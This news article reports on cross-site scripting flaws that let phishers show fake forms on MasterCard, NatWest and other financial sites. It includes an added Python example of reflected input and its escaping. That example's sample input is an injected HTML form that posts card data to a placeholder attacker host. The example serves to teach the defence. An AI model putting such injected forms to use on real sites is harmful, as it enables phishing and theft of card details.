Leading financial institutions have adopted a more aggressive attitude toward online identity theft cons known as "phishing scams" in recent months. But companies, including MasterCard, may be unwittingly helping phishers trick online shoppers, says a new report from a UK web developer.
A test of leading financial services websites, including those run by MasterCard, NatWest and Reuters, revealed that many have loosely protected features that scam artists can use to mask their own sites, hijacking the name and web address of established institutions, said Sam Greenhalgh, who operates www.zapthedingbat.com.
Nineteen-year-old Greenhalgh is responsible for discovering a vulnerability in Microsoft's Internet Explorer web browser known as the "%01" vulnerability. That security hole, since closed by the company, was widely used in phishing scams to disguise the location of phishing websites, which online scam artists use to harvest sensitive personal and financial information from their victims. He published a report at zapthedingbat.com on his latest findings.
Phishing scams use spam e-mail to direct internet users to sites controlled by thieves, but designed to look like legitimate e-commerce operations. Users are asked to provide sensitive information such as a password, Social Security number, bank account or credit card number, often under the guise of updating account information.
The security lapses at major financial sites are not caused by flawed Microsoft products, Greenhalgh said; the trick works with most popular web browsers. Instead, poorly designed and insecure features on leading sites containing "cross-site scripting" vulnerabilities are to blame, he said.
Greenhalgh uses the example of an "ATM Locator" feature on MasterCard's website. The locator was designed to pinpoint cash machines that accept MasterCard. Users input a location, including a country and street address, and the site provides the location of cash machines in the area. However, because of a cross-site scripting vulnerability, Greenhalgh was able to inject his own HTML into the fields used by the ATM Locator, causing the mastercard.com site to display his content, including a mock form that could be used to harvest information.
With the web browser address bar reading "www.mastercard.com" and the MasterCard logo on the page, even sophisticated web surfers would be hard put to prove they were not interacting with the credit card company instead of scam artists, Greenhalgh said.
"The danger to the public is in increasing their susceptibility," Greenhalgh said. "Phishing attacks have been around a long time and usually they're very easy to spot - you can look in the address bar and see you're not at mastercard.com. But these flaws allow phishers to actually use the legitimate site. As a user, it's very hard to tell," he said.
MasterCard declined to comment, and NatWest did not immediately respond.
Web search features are a common source of cross-site scripting flaws, especially those that echo back the requested search word or phrase to users, Greenhalgh said.
Greenhalgh's website notes similar flaws in seven other sites, including attacks on search features at reuters.com, internet payment service WorldPay and NatWest bank.
"In effect what I am doing is using something that is designed to trust user input too much," he said.
Among other things, developers should design web forms to validate the data that users enter into the fields and "sanitise" it, removing characters such as brackets that are used to render HTML and other computer code.
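The pattern described above (a search feature that echoes the submitted term back into the page, and the advice to validate and sanitise that input) can be shown in a few lines. The example below is added here and is not code from the article or from any of the sites it names; the sample search term, the template and the function names are constructed for illustration. It contrasts the flawed echo with two defences: stripping the angle brackets, as the article suggests, and HTML-encoding the term on output, which is the more general fix because it keeps the user's text intact while ensuring the browser treats it as text rather than markup.

```python
import html
import re

# Constructed sample input for this example: a search term that carries
# markup for a fake form of the kind the article describes. The hostname is
# a placeholder (the .example TLD is reserved for documentation).
INJECTED_TERM = '<form action="http://attacker.example/collect">card number</form>'

# Minimal results page: the search term is reflected into the HTML body.
TEMPLATE = "<p>Results for: {term}</p>"

# Matches any HTML tag so we can count how many the page contains.
TAG_RE = re.compile(r"<[^>]*>")


def render_search_unsafe(term: str) -> str:
    """Reflect the term verbatim: the cross-site scripting flaw in the article."""
    return TEMPLATE.format(term=term)


def render_search_stripped(term: str) -> str:
    """The article's suggestion: delete the brackets used to build HTML.

    This neutralises tags but is lossy (a search for "a < b" is altered) and
    only covers the HTML-tag case, so it is shown here for comparison.
    """
    return TEMPLATE.format(term=term.replace("<", "").replace(">", ""))


def render_search_safe(term: str) -> str:
    """Encode the term on output so any markup it contains renders as text."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def injected_tag_count(rendered: str) -> int:
    """Number of HTML tags in the page beyond those the template itself emits.

    Zero means the user-controlled term added no markup; anything above zero
    means the input was able to change the page structure.
    """
    baseline = len(TAG_RE.findall(TEMPLATE.format(term="")))
    return len(TAG_RE.findall(rendered)) - baseline


if __name__ == "__main__":
    for name, render in (
        ("unsafe", render_search_unsafe),
        ("stripped", render_search_stripped),
        ("escaped", render_search_safe),
    ):
        page = render(INJECTED_TERM)
        print(f"{name:9s} injected tags={injected_tag_count(page)} :: {page}")
```

Running the block prints the three renderings: the unsafe version contains the injected form element, while the stripped and escaped versions add no tags of their own. The escaped version still shows the user exactly what they typed, which is why encoding at the point of output is the defence usually recommended for reflected input.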
The flaws are easy to fix, but have been overlooked for years. Still, Greenhalgh doesn't believe that the cross-site scripting holes have been exploited in phishing attacks at the institutions he named - at least not yet.
The cross-site scripting vulnerability is an old exploit that has been around for a long time, but hasn't yet been exploited by scam artists, said Dave Kurzynski, chief technology officer of internet brand protection firm NameProtect. Still, its use could become more common as easier avenues to trick consumers are closed to scammers, he said.
The cross-site scripting problems at leading financial services sites couldn't be used to distribute malicious code, unlike a recent flaw in Microsoft's Internet Information Services Web server. However, they could be used to fool web surfers into downloading malicious code, such as ActiveX programs created by scam artists or hackers, he said.
Shoddy coding by web developers is mostly responsible, but the companies are also to blame, he said.
"I think it's a matter of the attitude that both developers and their employers have to their product and the quality of service that they are giving to customers. Quality of service is not just a factor of what the customer perceives. It's a whole package."
Companies from all industries should be looking at their websites and web-based applications carefully with cross-site scripting vulnerabilities in mind, Kurzynski said.
"Any website that accepts text input and displays it is possibly vulnerable. Any newly written application should be designed with this in mind and legacy applications which have been in use since this exploit was discovered need to be changed to protect against it," he said.
Greenhalgh did not notify companies mentioned in the report about the problems. Doing so would only allow them to correct the problem without addressing the larger security issues facing their sites, he said.
The number of phishing attacks has risen sharply in recent months, according to industry groups.
The number of unique attacks reported to the Anti-Phishing Working Group (APWG) increased 6% in May to 1,197, with an average of 38.6 reports each day. Financial services companies are the primary target of the scams, according to the APWG.
In June, MasterCard announced a partnership with NameProtect to combat phishing. The two companies are combining their efforts, giving MasterCard access to data from NameProtect's technology, which can search and filter large volumes of internet content to find online scams. The companies will also work with law enforcement to shut down internet sites and tools used by identity thieves.
Raising public awareness of the flaws may be the only way to spur widespread action, Greenhalgh said. "If they get egg on their face, that's par for the course. I think that might help in a way," he said.
Paul Roberts writes for IDG News Service